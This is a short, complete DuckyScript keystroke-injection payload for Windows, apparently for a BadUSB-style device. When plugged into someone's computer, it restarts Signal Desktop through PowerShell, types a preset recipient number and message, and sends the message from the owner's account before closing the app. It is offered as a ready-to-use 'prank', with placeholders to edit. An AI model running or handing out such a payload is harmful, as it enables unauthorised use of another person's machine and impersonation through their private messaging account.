REM #########################################
REM #                                       |
REM # Title        : Send Signal Messages   |
REM # Author       : Aleff                  |
REM # Version      : 1.0                    |
REM # Category     : Prank, Execution       |
REM # Target       : Windows 10-11          |
REM #                                       |
REM #########################################

REM Requirements:
REM   - Internet Connection
REM   - Signal App installed
REM Payload Plug-And-Play but can be edited as you want the message

REM REQUIRED - Receiver number
DEFINE #NUMBER 3332211000

REM REQUIRED - Message to send
DEFINE #MESSAGE YOUR_MESSAGE

DEFAULT_DELAY 500

GUI r
STRINGLN powershell
STRINGLN Stop-Process -Name "Signal"
STRINGLN Start-Process $Env:USERPROFILE\AppData\Local\Programs\signal-desktop\Signal.exe; exit
DELAY 5000
REPEAT 3 TAB
ENTER
STRING #NUMBER
TAB
ENTER

REM This is the message that will be sent.
REM You can change it as you want, if you want.
STRINGLN #MESSAGE

REM Closing Signal App
ALT F4
